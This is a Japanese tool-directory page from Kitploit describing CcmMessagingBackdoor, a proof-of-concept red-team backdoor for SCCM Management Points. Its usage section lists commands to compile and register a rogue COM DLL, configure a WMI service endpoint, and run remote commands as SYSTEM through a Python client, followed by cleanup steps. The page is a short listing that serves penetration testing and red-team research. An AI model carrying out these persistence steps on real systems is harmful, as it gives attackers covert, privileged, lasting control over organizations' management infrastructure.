Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CcmMessagingBackdoor — 不正なCOMサービスを利用してSYSTEM権限で永続的なリモートコマンド実行を行う、SCCM管理ポイント向けのPoCバックドア。 | Kitploit
ツール/GitHubGitHub/synacktiv/ccmmessagingbackdoor
永続化メカニズムポストエクスプロイトコマンド&コントロールレッドチーミングリモートアクセスツールペイロード開発
GitHubsynacktiv/ccmmessagingbackdoor

CcmMessagingBackdoor

不正なCOMサービスを利用してSYSTEM権限で永続的なリモートコマンド実行を行う、SCCM管理ポイント向けのPoCバックドア。

リポジトリを見る
1921年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CcmMessagingBackdoor

Management Point 上でアクセスを維持するために、不正な CcmMessaging サービスを構築・インストールする Proof of Concept ツール

使用法

  • Management Point 上で不正な COM サービスをコンパイルしてインストールします
root@kitploit:~
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
  • WMI でサービス エンドポイントを構成します
root@kitploit:~
PS C:\>  ./wmi_create_rogue_service_endpoint.ps1
  • Python クライアントを使用して PowerShell コマンドを実行します
root@kitploit:~
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
  • クリーンアップするには
root@kitploit:~
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

TODO

  • CcmExec プロセスのランダムなクラッシュを修正する(現時点では原因不明)
ツールをダウンロード